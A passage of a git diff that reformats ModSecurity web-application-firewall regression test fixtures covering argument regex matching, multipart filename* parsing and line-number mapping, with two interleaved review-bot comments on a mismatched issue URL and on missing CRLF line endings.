- "uri":"/?x=foo%3d", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - 
"gihub_issue": 1743, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?x=foo=", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "/?x=foo=", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1785.json b/test/test-cases/regression/issue-1785.json index ba252b144f..ef8501686c 100644 --- a/test/test-cases/regression/issue-1785.json +++ b/test/test-cases/regression/issue-1785.json 
@@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,18 +25,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-1812.json b/test/test-cases/regression/issue-1812.json index 47c51933bd..ca8b8eef9b 100644 --- a/test/test-cases/regression/issue-1812.json +++ b/test/test-cases/regression/issue-1812.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Converting £ (%C2%A3) from query string", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1812", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1812", "client": { "ip": "200.249.12.31", "port": 2313 
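Review bot: The `url` line rewritten in the first hunk of issue-1785.json still points at issue 1152, and the unchanged `title` is the issue-1152 title too, so the fixture's metadata does not identify the issue the file name refers to. Since the line is being touched anyway, it could become `"url": "https://github.com/SpiderLabs/ModSecurity/issues/1785"` with a matching title. This assumes the file name is the authoritative reference.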
@@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,21 +25,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3" + "debug_log": "/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1825.json b/test/test-cases/regression/issue-1825.json index 41fc349ff8..9d7a6aefd7 100644 --- a/test/test-cases/regression/issue-1825.json +++ b/test/test-cases/regression/issue-1825.json 
@@ -1,339 +1,372 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (1/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" +[ + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (1/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "350", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + 
"Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (2/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (2/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "354", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + 
"----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (3/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (3/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "326", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; 
name=\"filedata\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\r\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--\r" - ] - }, - "response":{ - "headers":"", - "body":"" - }, - "expected":{ - "debug_log":"Warning: no filename= but filename*" - }, - "rules":[ + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Warning: no filename= but filename*", + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (4/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (4/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "345", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": 
"100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-16" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-16", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (5/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (5/7)", + "client": { + "ip": 
"200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "349", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-17" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-17", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (6/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - 
"User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (6/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "348", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-18" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-18", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME 
\"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (7/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (7/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "348", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + 
"headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQBODY_ERROR \"!@eq 0\" \"id:1,phase:2,deny,status:403\"" ] } ] - diff --git a/test/test-cases/regression/issue-1831.json b/test/test-cases/regression/issue-1831.json index 773a0eec97..e8f5fc6e86 100644 --- a/test/test-cases/regression/issue-1831.json +++ b/test/test-cases/regression/issue-1831.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,21 +25,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\\\\xc2\\\\xa3" + "debug_log": "\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", 
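Review bot: Every body line in the seven issue-1825.json cases now ends in a bare `\n`, and only the closing delimiter of case 3/7 uses `\r\n`, so none of these fixtures presents a multipart body with CRLF throughout, which is the form multipart/form-data takes on the wire. The lone `\r` in 3/7 was already there before this change (`--\r`), but nothing in the case says whether mixed terminators are part of what it checks. I would either state that in the title of 3/7 or add one case whose lines all end in `\r\n` with a matching `Content-Length`, so the `filename*` handling is also covered for the CRLF form. The hunk spans the whole file, and how the loader joins the body array is not visible here.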
@@ -51,7 +58,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,7 +71,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -72,18 +79,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 200 @@ -101,7 +114,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -114,7 +127,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -122,22 +135,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"1\"" + "debug_log": "Target value: \"1\"", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -150,7 +169,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -163,7 +182,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -171,22 +190,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1" + "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -195,6 +220,3 @@ ] } ] - - - diff --git a/test/test-cases/regression/issue-1844.json b/test/test-cases/regression/issue-1844.json index 6ccb1f5e8a..e93b71f17b 100644 --- a/test/test-cases/regression/issue-1844.json +++ b/test/test-cases/regression/issue-1844.json 
@@ -1,279 +1,290 @@ [ { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "26", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"29\"" + "expected": { + "error_log": "line \"29\"", + "http_code": 200 }, - 